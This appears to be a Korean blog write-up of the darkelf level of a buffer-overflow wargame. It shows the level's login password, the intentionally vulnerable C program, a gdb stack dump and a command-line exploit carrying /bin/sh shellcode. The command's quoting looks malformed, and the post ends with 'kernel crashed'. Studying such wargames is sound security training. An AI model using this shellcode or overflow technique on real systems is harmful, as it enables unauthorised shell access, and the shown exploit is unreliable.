login : wolfman
password : love eyuna
/*
The Lord of the BOF : The Fellowship of the BOF
- darkelf
- egghunter + buffer hunter + check length of argv[1]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
이전문제와 똑같은데 check the length of argument가 추가되었다
이전문제에서 48이상 넣지 않았기때문에 그냥 똑같이 풀면될거같다,
0xbffffbe8: 0x0000000e 0x000001f9 0x00000010 0x0f8bfbff
0xbffffbf8: 0x0000000f 0xbffffc29 0x00000000 0x00000000
0xbffffc08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc28: 0x38366900 0x682f0036 0x2f656d6f 0x666c6f77
0xbffffc38: 0x2f6e616d 0x706d6574 0x61616100 0x61616161
0xbffffc48: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffc58: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffc68: 0x61616161 0xbfbfbf61 0x454c00bf 0x504f5353
0xbffffc50 들고가야지
./darkelf `python -c print'"\x90"*19 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x50\xfc\xff\xbf"'`
kernel crashed
'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글
| [Lord Of BufferOverFlow] 8번 orge -> troll (0) | 2021.02.26 |
|---|---|
| [Lord Of BufferOverFlow] 7번 darkelf -> orge (0) | 2021.02.26 |
| [Lord Of BufferOverFlow] 5번 orc -> wolfman (0) | 2021.02.25 |
| [Lord Of BufferOverFlow] 4번 goblin -> orc (0) | 2021.02.23 |
| [Lord Of BufferOverFlow] 3번 cobolt -> goblin (0) | 2021.02.23 |
